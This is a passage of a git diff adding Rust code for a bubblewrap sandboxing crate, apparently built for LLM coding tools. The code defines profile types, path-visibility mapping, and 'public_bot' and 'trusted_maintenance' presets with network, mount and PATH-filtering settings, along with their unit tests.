+        let home = fixture.home().to_path_buf();
+        let cache = fixture.cache().to_path_buf();
+        let host_tmp = fixture.make_dir("host-tmp");
+        let cred_file = fixture.temp_path().join("cred.txt");
+        fs::write(&cred_file, "secret").unwrap();
+
+        let builder = Builder::new(
+            &*workspace,
+            &*home,
+            &*cache,
+            TmpBacking::BindHost(host_tmp.into_boxed_path()),
+        )
+        .with_read_only_host_rootfs(true)
+        .with_network_policy(NetworkPolicy::Disabled)
+        .with_clear_env(true)
+        .with_default_env(Arc::from([EnvVar::new("A", "1"), EnvVar::new("B", "2")]))
+        .with_extra_env(Arc::from([EnvVar::new("C", "3")]))
+        .with_compat_symlinks(Arc::from([Symlink::new(
+            "/usr/bin/python3",
+            Path::new("/usr/bin/python3"),
+        )]))
+        .with_tmpfs_overlays(Arc::from([Path::new("/run").into()]))
+        .with_credential_file_mounts(Arc::from([FileMount::new(
+            cred_file.into_boxed_path(),
+            Path::new("/sandbox/cred.txt"),
+        )]))
+        .with_read_write_mounts(Arc::from([Path::new("/data").into()]));
+
+        let capacity = arg_capacity_for(&builder);
+        let args = build_static_args(&builder);
+        assert_eq!(args.len(), capacity);
+    }
+
+    #[test]
+    #[serial]
+    fn arg_capacity_for_minimal_builder() {
+        let fixture = SandboxFixture::new("exit 0");
+        let workspace = fixture.temp_path().to_path_buf();
+        let home = fixture.home().to_path_buf();
+        let cache = fixture.cache().to_path_buf();
+
+        let builder = Builder::new(&*workspace, &*home, &*cache, TmpBacking::Tmpfs);
+
+        let capacity = arg_capacity_for(&builder);
+        let args = build_static_args(&builder);
+        assert_eq!(args.len(), capacity);
+    }
+
+    #[test]
+    fn build_rejects_invalid_env_var_names() {
+        let dirs = SandboxDirs::new();
+
+        let err = Builder::new(
+            dirs.workspace(),
+            dirs.home(),
+            dirs.cache(),
+            TmpBacking::Tmpfs,
+        )
+        .with_default_env(Arc::from([EnvVar::new("BAD=NAME", "value")]))
+        .build()
+        .unwrap_err();
+
+        assert!(format!("{err}").contains("must not contain '='"));
+    }
+
+    #[test]
+    fn build_rejects_unavailable_backend_reason() {
+        let dirs = SandboxDirs::new();
+
+        let err = Builder::new(
+            dirs.workspace(),
+            dirs.home(),
+            dirs.cache(),
+            TmpBacking::Tmpfs,
+        )
+        .with_availability(Availability::unavailable("bwrap blocked by policy"))
+        .build()
+        .unwrap_err();
+
+        assert!(format!("{err}").contains("bwrap blocked by policy"));
+        assert!(format!("{err}").contains("unavailable"));
+    }
+
+    #[test]
+    fn public_bot_preset_rejects_nonexistent_workspace_directory() {
+        let temp = TempDir::new().unwrap();
+        let home = temp.path().join("home");
+        let cache = temp.path().join("cache");
+        fs::create_dir(&home).unwrap();
+        fs::create_dir(&cache).unwrap();
+        let workspace = temp.path().join("workspace_does_not_exist");
+
+        let err = Builder::public_bot(&*workspace, &*home, &*cache, Some(TmpBacking::Tmpfs))
+            .with_availability(Availability::Available)
+            .build()
+            .unwrap_err();
+
+        assert!(format!("{err}").contains("workspace host directory"));
+    }
+}
diff --git a/src/llm-coding-tools-bubblewrap/src/profile/layout.rs b/src/llm-coding-tools-bubblewrap/src/profile/layout.rs
new file mode 100644
index 00000000..535efa3a
--- /dev/null
+++ b/src/llm-coding-tools-bubblewrap/src/profile/layout.rs
@@ -0,0 +1,170 @@
+//! Given a host path, determine whether it is reachable inside the sandbox
+//! and where it appears.
+//!
+//! A bubblewrap sandbox hides the host filesystem and re-exposes only
+//! specific directories (workspace, home, `/tmp`, extra mounts).
+//!
+//! Callers need this to pick a usable shell, translate a working directory,
+//! or validate a user-supplied path before launching a sandboxed command.
+
+use super::types::{FileOverlay, TmpBacking};
+use std::borrow::Cow;
+use std::path::{Path, PathBuf};
+
+/// Snapshot of the path-mapping rules that determine which host paths are
+/// reachable inside the sandbox and where they appear.
+///
+/// Constructed from either a [`Profile`][super::types::Profile] or an
+/// in-progress [`Builder`][super::builder::Builder] and passed to
+/// [`SandboxLayout::classify`].
+#[derive(Clone, Copy)]
+pub(crate) struct SandboxLayout<'a> {
+    pub(crate) workspace: &'a Path,
+    pub(crate) workspace_dest: &'a Path,
+    pub(crate) synthetic_home: &'a Path,
+    pub(crate) synthetic_home_dest: &'a Path,
+    pub(crate) cache_root: &'a Path,
+    pub(crate) mount_cache_root: bool,
+    pub(crate) tmp_backing: &'a TmpBacking,
+    pub(crate) read_only_host_rootfs: bool,
+    pub(crate) tmpfs_overlays: &'a [Box<Path>],
+    pub(crate) file_overlays: &'a [FileOverlay],
+    pub(crate) read_only_mounts: &'a [Box<Path>],
+    pub(crate) read_write_mounts: &'a [Box<Path>],
+}
+
+/// Describes where a host path ends up inside the sandbox.
+pub(crate) enum PathMapping<'config, 'path> { + /// The path appears at the same absolute location in the sandbox. + SamePath, + /// The path appears under a different prefix inside the sandbox. + /// + /// The sandbox path is `dest_prefix` joined with `relative`. + Remap { + dest_prefix: &'config Path, + relative: &'path Path, + }, +} + +impl<'config> SandboxLayout<'config> { + /// Determines how `entry` appears inside the sandbox, if at all. + /// + /// Returns [`Some`] with the mapping when the host path is reachable, + /// [`None`] when it is hidden (not mounted, or covered by a tmpfs overlay). + /// Relative paths are always `None`. + pub(crate) fn classify(self, entry: &Path) -> Option> { + // Relative paths have no fixed location inside the sandbox. + if !entry.is_absolute() { + return None; + } + // Workspace: the project directory the sandbox is allowed to read/write. + if let Some(mapping) = map_prefix(entry, self.workspace, self.workspace_dest) { + return Some(mapping); + } + // Synthetic home: the sandbox's $HOME, bind-mounted from the host. + if let Some(mapping) = map_prefix(entry, self.synthetic_home, self.synthetic_home_dest) { + return Some(mapping); + } + // Caller-provided tmp directory, remapped to /tmp inside the sandbox. + if let TmpBacking::BindHost(host_dir) = self.tmp_backing { + if let Some(mapping) = map_prefix(entry, host_dir, Path::new("/tmp")) { + return Some(mapping); + } + } + // Cache root: mounted read-write when enabled. + if self.mount_cache_root && entry.starts_with(self.cache_root) { + return Some(PathMapping::SamePath); + } + // Extra mounts: user-specified read-only and read-write bind mounts. + // Both appear after tmpfs/file overlays in the bwrap arg list, so they + // always take precedence over any overlay at overlapping paths. 
+ if self + .read_only_mounts + .iter() + .chain(self.read_write_mounts.iter()) + .any(|mount| entry.starts_with(mount.as_ref())) + { + return Some(PathMapping::SamePath); + } + // Read-only host rootfs: everything else is visible unless a tmpfs + // overlay hides it. + if self.read_only_host_rootfs + && !path_hidden_by_overlay( + self.tmpfs_overlays, + self.file_overlays, + self.tmp_backing, + entry, + ) + { + return Some(PathMapping::SamePath); + } + None + } +} + +/// Whether `entry` is masked by a tmpfs overlay (and therefore unreadable +/// even when the host rootfs is mounted read-only). +/// +/// Explicit [`tmpfs_overlays`] always win. +/// When `/tmp` itself is backed by tmpfs, any path under `/tmp` (except +/// a bind-mounted host directory) counts as hidden. +/// +/// [`tmpfs_overlays`]: SandboxLayout::tmpfs_overlays +pub(crate) fn path_hidden_by_overlay( + tmpfs_overlays: &[Box], + file_overlays: &[FileOverlay], + tmp_backing: &TmpBacking, + entry: &Path, +) -> bool { + // Explicit overlays (e.g. /home) always shadow the host. + if tmpfs_overlays + .iter() + .any(|overlay| entry.starts_with(overlay)) + { + return true; + } + // File overlays (e.g. /etc/shadow) mask the exact file. + if file_overlays + .iter() + .any(|overlay| *entry == *overlay.dest()) + { + return true; + } + match tmp_backing { + // Pure tmpfs: nothing under /tmp comes from the host. + TmpBacking::Tmpfs => entry.starts_with(Path::new("/tmp")), + // Bind-mounted host dir: that subdir is real, the rest of /tmp is tmpfs. + TmpBacking::BindHost(host_dir) => { + entry.starts_with(Path::new("/tmp")) && !entry.starts_with(host_dir) + } + } +} + +/// Maps a sandbox prefix and relative path into a sandbox path. 
+pub(crate) fn join_mapped_path<'a>(base: &'a Path, relative: &Path) -> Cow<'a, Path> { + if relative.as_os_str().is_empty() { + Cow::Borrowed(base) + } else { + let mut joined = + PathBuf::with_capacity(base.as_os_str().len() + relative.as_os_str().len() + 1); + joined.push(base); + joined.push(relative); + Cow::Owned(joined) + } +} + +fn map_prefix<'config, 'path>( + entry: &'path Path, + host_prefix: &Path, + dest_prefix: &'config Path, +) -> Option> { + let relative = entry.strip_prefix(host_prefix).ok()?; + if host_prefix == dest_prefix { + Some(PathMapping::SamePath) + } else { + Some(PathMapping::Remap { + dest_prefix, + relative, + }) + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/profile/mod.rs b/src/llm-coding-tools-bubblewrap/src/profile/mod.rs new file mode 100644 index 00000000..0ca7a6bc --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/profile/mod.rs @@ -0,0 +1,19 @@ +//! Bubblewrap profile types, builders, and preset helpers. +//! +//! Public callers should use the short aliases in this module: +//! - [`Builder`] - builds a sandbox profile +//! - [`Profile`] - validated sandbox profile ready for repeated execution +//! - [`Preset`] - preset name stored on the profile +//! - [`TmpBacking`] - how sandbox `/tmp` is mounted + +mod builder; +pub(crate) mod layout; +mod presets; +mod types; +pub(crate) mod validation; + +pub use builder::Builder; +pub use types::{ + Availability, EnvVar, FileMount, FileOverlay, NetworkPolicy, Preset, Profile, Symlink, + TmpBacking, +}; diff --git a/src/llm-coding-tools-bubblewrap/src/profile/presets.rs b/src/llm-coding-tools-bubblewrap/src/profile/presets.rs new file mode 100644 index 00000000..a7df327f --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/profile/presets.rs @@ -0,0 +1,364 @@ +//! Preset helpers for common sandbox setups. +//! +//! Use [`crate::profile::Builder::public_bot`] for untrusted input. +//! Use [`crate::profile::Builder::trusted_maintenance`] for trusted jobs. +//! 
Both return a [`crate::profile::Builder`], so you can still change settings +//! before calling [`crate::profile::Builder::build`]. + +use super::builder::Builder; +use super::types::{EnvVar, FileOverlay, NetworkPolicy, Preset, Symlink, TmpBacking}; +use crate::path_util::normalize_path; +use std::collections::HashSet; +use std::path::{Path, PathBuf}; +use std::sync::Arc; + +impl Builder { + /// Creates the public-bot preset builder. + /// + /// Good default for untrusted input. + /// + /// - mounts selected system paths, the workspace, and a synthetic home + /// - clears the inherited env and sets a cleaned `PATH` plus `HOME` + /// - disables network + /// - uses `/workspace` and `/home/sandbox` inside the sandbox + /// - does not mount the cache root + /// - uses `Tmpfs` for `/tmp` unless you pass `Some(...)` + /// + /// It hides the real home directory, `/etc`, and other unrelated host + /// paths. + /// + /// # Arguments + /// - `workspace` - Host path to the workspace directory. + /// - `synthetic_home` - Host path to the synthetic home directory. + /// - `cache_root` - Host path to the cache root directory (not mounted by default). + /// - `tmp_backing` - Optional `/tmp` backing. Defaults to `Tmpfs`. + pub fn public_bot( + workspace: impl Into>, + synthetic_home: impl Into>, + cache_root: impl Into>, + tmp_backing: Option, + ) -> Self { + Self::new( + workspace, + synthetic_home, + cache_root, + tmp_backing.unwrap_or(TmpBacking::Tmpfs), + ) + .with_preset(Preset::PublicBot) + .with_workspace_dest(Path::new(WORKSPACE_DEST)) + .with_synthetic_home_dest(Path::new(SYNTHETIC_HOME_DEST)) + .with_mount_cache_root(false) + .with_clear_env(true) + .with_default_env(Arc::from([ + EnvVar::new("PATH", inherited_path(Preset::PublicBot)), + EnvVar::new("HOME", SYNTHETIC_HOME_DEST), + ])) + .with_read_only_mounts(public_bot_read_only_mounts()) + .with_compat_symlinks(public_bot_compat_symlinks()) + } + + /// Creates the trusted-maintenance preset builder. 
+ /// + /// Use this only for trusted jobs. Network stays enabled, so a command can + /// send out any data it can read. + /// + /// - mounts the host root read-only + /// - overlays tmpfs on `/home`; masks `/etc/shadow` with an empty file + /// - uses a synthetic home at `/home/sandbox` + /// - clears the inherited env and sets a cleaned `PATH`, `HOME`, `TMPDIR`, and `XDG_*` + /// - keeps network enabled + /// - bind-mounts the `host_tmp` directory at `/tmp` + /// + /// Writable state stays in the synthetic home, workspace, cache root, and + /// tmpfs overlays. `/etc/shadow` is masked by a read-only bind-mount of an + /// empty regular file so password hashes are not exposed. + /// + /// # Arguments + /// - `workspace` - Host path to the workspace directory. + /// - `synthetic_home` - Host path to the synthetic home directory. + /// - `cache_root` - Host path to the cache root directory. Missing + /// `xdg-cache` and `xdg-state` subdirectories are created during `build()`. + /// - `host_tmp` - Host path to mount at sandbox `/tmp` (must exist). 
+ pub fn trusted_maintenance( + workspace: impl Into>, + synthetic_home: impl Into>, + cache_root: impl Into>, + host_tmp: impl Into>, + ) -> Self { + let cache_root = cache_root.into(); + let tmp_backing = TmpBacking::BindHost(host_tmp.into()); + + Self::new(workspace, synthetic_home, cache_root.clone(), tmp_backing) + .with_preset(Preset::TrustedMaintenance) + .with_synthetic_home_dest(Path::new(SYNTHETIC_HOME_DEST)) + .with_read_only_host_rootfs(true) + .with_tmpfs_overlays(Arc::from([Box::from(Path::new("/home"))])) + .with_file_overlays(Arc::from([FileOverlay::new( + Path::new("/dev/null"), + Path::new("/etc/shadow"), + )])) + .with_clear_env(true) + .with_network_policy(NetworkPolicy::Enabled) + .with_default_env(Arc::from([ + EnvVar::new("PATH", inherited_path(Preset::TrustedMaintenance)), + EnvVar::new("HOME", SYNTHETIC_HOME_DEST), + EnvVar::new("TMPDIR", "/tmp"), + EnvVar::new( + "XDG_CACHE_HOME", + cache_root.join("xdg-cache").to_string_lossy().into_owned(), + ), + EnvVar::new("XDG_CONFIG_HOME", SYNTHETIC_HOME_CONFIG), + EnvVar::new( + "XDG_STATE_HOME", + cache_root.join("xdg-state").to_string_lossy().into_owned(), + ), + ])) + } +} + +const SYNTHETIC_HOME_DEST: &str = "/home/sandbox"; +const SYNTHETIC_HOME_CONFIG: &str = "/home/sandbox/.config"; +const WORKSPACE_DEST: &str = "/workspace"; + +const DEFAULT_SANDBOX_PATH: &str = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/run/current-system/sw/bin:/nix/var/nix/profiles/default/bin"; +const PUBLIC_BOT_PREFIXES: &[&str] = &[ + "/usr/bin", + "/usr/sbin", + "/usr/lib", + "/usr/local/bin", + "/usr/local/sbin", + "/usr/local/lib", + "/bin", + "/sbin", + "/lib", + "/lib64", + "/run/current-system/sw", + "/nix/store", + "/nix/var/nix/profiles/default", +]; +const TRUSTED_DENY_PREFIXES: &[&str] = &[ + "/home", + "/root", + "/tmp", + "/var/tmp", + "/run/user", + "/run/wrappers/bin", + "/etc/profiles/per-user", +]; + +/// Builds a filtered `PATH` string from the host environment for the given 
[`Preset`]. +/// +/// Each host entry is checked with [`path_entry_allowed`]; entries that fail the +/// check, are empty, or are duplicates are dropped. Falls back to +/// [`DEFAULT_SANDBOX_PATH`] when the host `PATH` is unset or all entries are +/// filtered out. +fn inherited_path(preset: Preset) -> String { + let Some(path) = std::env::var_os("PATH") else { + return DEFAULT_SANDBOX_PATH.to_string(); + }; + + // Preallocate based on upper bound: number of separators + 1 + let path_bytes = path.as_encoded_bytes(); + let capacity = path_bytes.iter().filter(|&&b| b == b':').count() + 1; + let mut entries = Vec::with_capacity(capacity); + let mut seen = HashSet::with_capacity(capacity); + for entry in std::env::split_paths(&path) { + let entry = normalize_path(&entry); + if !path_entry_allowed(preset, &entry) { + continue; + } + let value = entry.to_string_lossy(); + if value.is_empty() { + continue; + } + let value = value.into_owned(); + if !seen.insert(value.clone()) { + continue; + } + entries.push(value); + } + + if entries.is_empty() { + DEFAULT_SANDBOX_PATH.to_string() + } else { + entries.join(":") + } +} + +/// Checks whether a `PATH` entry is safe to include for the given [`Preset`]. +/// +/// The caller must pass an absolute, normalized path. For [`Preset::PublicBot`] +/// only entries under [`PUBLIC_BOT_PREFIXES`] are allowed. For +/// [`Preset::TrustedMaintenance`] everything is allowed except entries under +/// [`TRUSTED_DENY_PREFIXES`]. +fn path_entry_allowed(preset: Preset, entry: &Path) -> bool { + match preset { + Preset::PublicBot => PUBLIC_BOT_PREFIXES + .iter() + .any(|prefix| entry.starts_with(prefix)), + Preset::TrustedMaintenance => { + entry.is_absolute() + && !TRUSTED_DENY_PREFIXES + .iter() + .any(|prefix| entry.starts_with(prefix)) + } + } +} + +/// Collects host directories to mount read-only for [`Preset::PublicBot`]. 
+/// +/// Checks each prefix in [`PUBLIC_BOT_PREFIXES`] against the host filesystem +/// and includes only those that exist. +fn public_bot_read_only_mounts() -> Arc<[Box]> { + let mut mounts = Vec::with_capacity(PUBLIC_BOT_PREFIXES.len()); + for path in PUBLIC_BOT_PREFIXES { + let path = PathBuf::from(path); + if path.exists() { + mounts.push(path.into_boxed_path()); + } + } + mounts.into() +} + +/// Collects compatibility symlinks for [`Preset::PublicBot`]. +/// +/// On systems without a merged `/usr` layout, `/bin`, `/lib`, and `/sbin` may +/// not exist as symlinks to their `/usr` counterparts. This function checks +/// each candidate and includes only those where the link path is absent and +/// the target directory exists on the host. +fn public_bot_compat_symlinks() -> Arc<[Symlink]> { + let mut symlinks = Vec::with_capacity(3); + for (target, link_path, required_path) in [ + ("usr/bin", "/bin", "/usr/bin"), + ("usr/lib", "/lib", "/usr/lib"), + ("usr/sbin", "/sbin", "/usr/sbin"), + ] { + if !Path::new(link_path).exists() && Path::new(required_path).exists() { + symlinks.push(Symlink::new(target, Path::new(link_path))); + } + } + symlinks.into() +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::profile::NetworkPolicy; + use crate::test_helpers::SandboxFixture; + use serial_test::serial; + use std::env; + + #[test] + #[serial] + fn public_bot_and_trusted_maintenance_differ_on_security_axes() { + let fixture = SandboxFixture::new("exit 0"); + let host_tmp = fixture.make_dir("host-tmp"); + + let public = Builder::public_bot( + fixture.workspace(), + fixture.home(), + fixture.cache(), + Some(TmpBacking::Tmpfs), + ) + .build() + .unwrap(); + + let trusted = Builder::trusted_maintenance( + fixture.workspace(), + fixture.home(), + fixture.cache(), + host_tmp.as_path(), + ) + .build() + .unwrap(); + + assert_eq!(public.preset(), Some(Preset::PublicBot)); + assert_eq!(trusted.preset(), Some(Preset::TrustedMaintenance)); + + 
assert!(!public.read_only_host_rootfs()); + assert!(trusted.read_only_host_rootfs()); + + assert!(public.tmpfs_overlays().is_empty()); + assert!(!trusted.tmpfs_overlays().is_empty()); + assert!(public.file_overlays().is_empty()); + assert!(!trusted.file_overlays().is_empty()); + + assert_eq!(public.network_policy(), NetworkPolicy::Disabled); + assert_eq!(trusted.network_policy(), NetworkPolicy::Enabled); + + assert!(!public.mount_cache_root()); + assert!(trusted.mount_cache_root()); + + assert!(public.clear_env()); + assert!(trusted.clear_env()); + + assert!(public.credential_file_mounts().is_empty()); + assert!(public.extra_env().is_empty()); + assert!(trusted.credential_file_mounts().is_empty()); + assert!(trusted.extra_env().is_empty()); + } + + #[test] + #[serial] + fn public_bot_path_filters_user_and_temp_entries() { + let fixture = SandboxFixture::new("exit 0"); + unsafe { + env::set_var( + "PATH", + format!( + "/home/alice/.cargo/bin:{}:/tmp/test-bin:/run/current-system/sw/bin:/nix/store/demo/bin", + fixture.temp_path().display() + ), + ) + }; + + let profile = Builder::public_bot( + fixture.workspace(), + fixture.home(), + fixture.cache(), + Some(TmpBacking::Tmpfs), + ) + .build() + .unwrap(); + + let path = profile.default_env()[0].value(); + assert!(path.contains(":")); + assert!(!path.contains("/home/alice/.cargo/bin")); + assert!(!path.contains("/tmp/test-bin")); + } + + #[test] + #[serial] + fn trusted_maintenance_path_filters_hidden_and_volatile_entries() { + let fixture = SandboxFixture::new("exit 0"); + let host_tmp = fixture.make_dir("host-tmp"); + unsafe { + env::set_var( + "PATH", + format!( + "{}:/home/alice/.nix-profile/bin:/run/user/1000/bin:/nix/store/demo/bin:/opt/tool/bin", + fixture.temp_path().display() + ), + ) + }; + + let profile = Builder::trusted_maintenance( + fixture.workspace(), + fixture.home(), + fixture.cache(), + host_tmp.as_path(), + ) + .build() + .unwrap(); + + let path = profile + .default_env() + .iter() + .find(|var| 
var.name() == "PATH") + .expect("PATH should be present") + .value(); + assert!(path.contains(":")); + assert!(!path.contains("/home/alice/.nix-profile/bin")); + assert!(!path.contains("/run/user/1000/bin")); + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/profile/types.rs b/src/llm-coding-tools-bubblewrap/src/profile/types.rs new file mode 100644 index 00000000..9223ad34 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/profile/types.rs @@ -0,0 +1,544 @@ +//! Types for bubblewrap profiles and related settings. +//! +//! Main types: +//! - [`crate::profile::Profile`] - validated sandbox profile +//! - [`crate::profile::Preset`] - preset name stored on the profile +//! - [`crate::profile::TmpBacking`] - how sandbox `/tmp` is mounted +//! - [`crate::profile::Availability`] - whether `bwrap` can run + +use super::layout::{join_mapped_path, PathMapping, SandboxLayout}; +use crate::LinuxBwrapError; +use std::borrow::Cow; +use std::ffi::OsString; +use std::path::Path; +use std::sync::Arc; + +/// Preset names for common sandbox setups. +/// +/// [`Self::TrustedMaintenance`] is only for trusted jobs. It keeps network +/// access enabled, so a command can send out any data it can read. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum Preset { + /// Safer defaults for untrusted or public input. + /// + /// This preset mounts selected system paths, the workspace, the synthetic + /// home, `/dev`, `/proc`, and `/tmp`. It does not expose the real home + /// directory or inherited env vars. + PublicBot, + /// Broader defaults for trusted jobs. + /// + /// This preset keeps network access enabled and exposes the host root + /// read-only. Do not use it for untrusted input. + TrustedMaintenance, +} + +/// Network policy for Linux sandbox execution. +#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)] +pub enum NetworkPolicy { + /// Network access is disabled (default). + #[default] + Disabled, + /// Network access is enabled. 
+ Enabled, +} + +/// How sandbox `/tmp` is mounted. +/// +/// Use [`Self::Tmpfs`] to keep `/tmp` in memory. Use [`Self::BindHost`] to +/// mount a host directory at `/tmp`. +#[derive(Debug, Clone, PartialEq, Eq, Default)] +pub enum TmpBacking { + /// Mount `/tmp` as tmpfs inside the sandbox. + #[default] + Tmpfs, + /// Mount a host directory at sandbox `/tmp`. + /// + /// You create and clean up the directory. + BindHost(Box), +} + +/// Whether bubblewrap can run. +/// +/// Stores the check result and, when unavailable, the reason. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum Availability { + /// Availability has not been checked yet. + Unknown, + /// Bubblewrap is available. + Available, + /// Bubblewrap cannot run. + Unavailable { + /// Why bubblewrap is unavailable. + reason: Box, + }, +} + +impl Availability { + /// Checks whether bubblewrap can run in the current process. + /// + /// # Returns + /// - [`Availability::Available`] when `bwrap` is present and usable. + /// - [`Availability::Unavailable`] with an actionable reason otherwise. + pub fn detect() -> Self { + crate::probe::probe_availability() + } + + /// Creates an unavailable state with a reason. + /// + /// # Examples + /// ``` + /// use llm_coding_tools_bubblewrap::profile::Availability; + /// + /// let avail = Availability::unavailable("bwrap not found"); + /// assert!(!avail.is_available()); + /// ``` + pub fn unavailable(reason: impl Into>) -> Self { + Self::Unavailable { + reason: reason.into(), + } + } + + /// Returns the reason when bubblewrap is unavailable. + /// + /// Returns `None` for `Unknown` and `Available`. + pub fn reason(&self) -> Option<&str> { + match self { + Self::Unavailable { reason } => Some(reason.as_ref()), + Self::Unknown | Self::Available => None, + } + } + + /// Returns whether bubblewrap is known to be available. + pub fn is_available(&self) -> bool { + matches!(self, Self::Available) + } +} + +/// One environment variable for the sandbox. 
+#[derive(Debug, Clone, PartialEq, Eq)] +pub struct EnvVar { + name: Box, + value: Box, +} + +impl EnvVar { + /// Creates an environment variable. + /// + /// # Arguments + /// - `name` - The variable name, such as `PATH` or `HOME`. + /// - `value` - The variable value. + pub fn new(name: impl Into>, value: impl Into>) -> Self { + Self { + name: name.into(), + value: value.into(), + } + } + + /// Returns the variable name. + pub fn name(&self) -> &str { + &self.name + } + + /// Returns the variable value. + pub fn value(&self) -> &str { + &self.value + } +} + +/// One symlink to create inside the sandbox root. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct Symlink { + target: Box, + link_path: Box, +} + +impl Symlink { + /// Creates a symlink entry. + /// + /// # Arguments + /// - `target` - The symlink target path. + /// - `link_path` - The path where the symlink is created inside the sandbox. + pub fn new(target: impl Into>, link_path: impl Into>) -> Self { + Self { + target: target.into(), + link_path: link_path.into(), + } + } + + /// Returns the symlink target. + pub fn target(&self) -> &str { + &self.target + } + + /// Returns the link path inside the sandbox. + pub fn link_path(&self) -> &Path { + &self.link_path + } +} + +/// One read-only file mount inside the sandbox. +/// +/// # Validation +/// - The source must be an absolute regular file on the host. +/// - The destination must stay under the mounted synthetic home, workspace, or cache root. +/// - Directory mounts, sockets, and agent forwarding are not allowed. +/// +/// Make sure the destination parent directory exists before launch. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct FileMount { + source: Box, + dest: Box, +} + +impl FileMount { + /// Creates a file mount. + /// + /// # Arguments + /// - `source` - The source file path on the host. + /// - `dest` - The destination path inside the sandbox. 
+ pub fn new(source: impl Into>, dest: impl Into>) -> Self { + Self { + source: source.into(), + dest: dest.into(), + } + } + + /// Returns the source file path on the host. + pub fn source(&self) -> &Path { + &self.source + } + + /// Returns the destination path inside the sandbox. + pub fn dest(&self) -> &Path { + &self.dest + } +} + +/// One read-only file overlay inside the sandbox. +/// +/// Replaces a file anywhere in the sandbox rootfs with content from a host +/// file via a read-only bind-mount. Unlike [`FileMount`], the destination is +/// not restricted to mounted prefixes - it can target any absolute path such +/// as `/etc/shadow` or `/etc/hostname`. +/// +/// # Validation +/// - The source must be an absolute path that exists on the host. +/// - The destination must be an absolute path. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct FileOverlay { + source: Box, + dest: Box, +} + +impl FileOverlay { + /// Creates a file overlay. + /// + /// # Arguments + /// - `source` - The host file whose content is bind-mounted read-only. + /// - `dest` - The sandbox path to be replaced. + pub fn new(source: impl Into>, dest: impl Into>) -> Self { + Self { + source: source.into(), + dest: dest.into(), + } + } + + /// Returns the host source file path. + pub fn source(&self) -> &Path { + &self.source + } + + /// Returns the sandbox destination path. + pub fn dest(&self) -> &Path { + &self.dest + } +} + +/// A validated bubblewrap profile ready for repeated command wrapping. +/// +/// Build this with [`crate::profile::Builder::build`](crate::profile::Builder::build). +/// +/// The build step validates profile-owned paths, resolves the `bwrap` binary, +/// picks a visible host shell, and precomputes the static `bwrap` argv prefix. +/// [`crate::wrap::wrap_command`] only needs to map the per-call working +/// directory and append the shell command tail. 
+#[derive(Debug, Clone, PartialEq, Eq)] +pub struct Profile { + pub(crate) preset: Option, + pub(crate) workspace: Box, + pub(crate) workspace_dest: Box, + pub(crate) synthetic_home: Box, + pub(crate) synthetic_home_dest: Box, + pub(crate) cache_root: Box, + pub(crate) tmp_backing: TmpBacking, + pub(crate) mount_cache_root: bool, + pub(crate) compat_symlinks: Arc<[Symlink]>, + pub(crate) read_only_mounts: Arc<[Box]>, + pub(crate) read_write_mounts: Arc<[Box]>, + pub(crate) tmpfs_overlays: Arc<[Box]>, + pub(crate) file_overlays: Arc<[FileOverlay]>, + pub(crate) credential_file_mounts: Arc<[FileMount]>, + pub(crate) read_only_host_rootfs: bool, + pub(crate) network_policy: NetworkPolicy, + pub(crate) clear_env: bool, + pub(crate) default_env: Arc<[EnvVar]>, + pub(crate) extra_env: Arc<[EnvVar]>, + pub(crate) availability: Availability, + pub(crate) bwrap_program: Arc, + pub(crate) shell: Box, + pub(crate) static_args: Arc<[OsString]>, +} + +impl Profile { + /// Builds the public-bot defaults in one call. + #[cfg(test)] + pub(crate) fn public_bot_defaults( + workspace: impl Into>, + synthetic_home: impl Into>, + cache_root: impl Into>, + tmp_backing: Option, + ) -> Result { + use super::Builder; + Builder::public_bot(workspace, synthetic_home, cache_root, tmp_backing).build() + } + + /// Builds the trusted-maintenance defaults in one call. + #[cfg(test)] + pub(crate) fn trusted_maintenance_defaults( + workspace: impl Into>, + synthetic_home: impl Into>, + cache_root: impl Into>, + host_tmp: impl Into>, + ) -> Result { + use super::Builder; + Builder::trusted_maintenance(workspace, synthetic_home, cache_root, host_tmp).build() + } + + /// Returns the preset used to create this profile, if any. + /// + /// Returns `None` if the profile was built without a preset. + pub fn preset(&self) -> Option { + self.preset + } + + /// Returns the host workspace path. + pub fn workspace(&self) -> &Path { + &self.workspace + } + + /// Returns the workspace path inside the sandbox. 
+ pub fn workspace_dest(&self) -> &Path { + &self.workspace_dest + } + + /// Returns the host synthetic home path. + pub fn synthetic_home(&self) -> &Path { + &self.synthetic_home + } + + /// Returns the synthetic home path inside the sandbox. + pub fn synthetic_home_dest(&self) -> &Path { + &self.synthetic_home_dest + } + + /// Returns the host cache root path. + pub fn cache_root(&self) -> &Path { + &self.cache_root + } + + /// Returns the backing strategy for sandbox `/tmp`. + pub fn tmp_backing(&self) -> &TmpBacking { + &self.tmp_backing + } + + /// Returns whether to mount the cache root. + pub fn mount_cache_root(&self) -> bool { + self.mount_cache_root + } + + /// Returns the compatibility symlinks as a slice. + pub fn compat_symlinks(&self) -> &[Symlink] { + &self.compat_symlinks + } + + /// Returns the read-only mounts as a slice. + pub fn read_only_mounts(&self) -> &[Box] { + &self.read_only_mounts + } + + /// Returns the read-write mounts as a slice. + pub fn read_write_mounts(&self) -> &[Box] { + &self.read_write_mounts + } + + /// Returns the tmpfs overlay paths as a slice. + pub fn tmpfs_overlays(&self) -> &[Box] { + &self.tmpfs_overlays + } + + /// Returns the file overlays as a slice. + /// + /// Each overlay replaces a sandbox file with a read-only bind-mount of a + /// host file, effectively masking the original content. + pub fn file_overlays(&self) -> &[FileOverlay] { + &self.file_overlays + } + + /// Returns the credential file mounts as a slice. + /// + /// Make sure destination parent directories exist before launch. + pub fn credential_file_mounts(&self) -> &[FileMount] { + &self.credential_file_mounts + } + + /// Returns whether the host root is mounted read-only. + pub fn read_only_host_rootfs(&self) -> bool { + self.read_only_host_rootfs + } + + /// Returns the network policy. + pub fn network_policy(&self) -> NetworkPolicy { + self.network_policy + } + + /// Returns whether inherited env vars are cleared. 
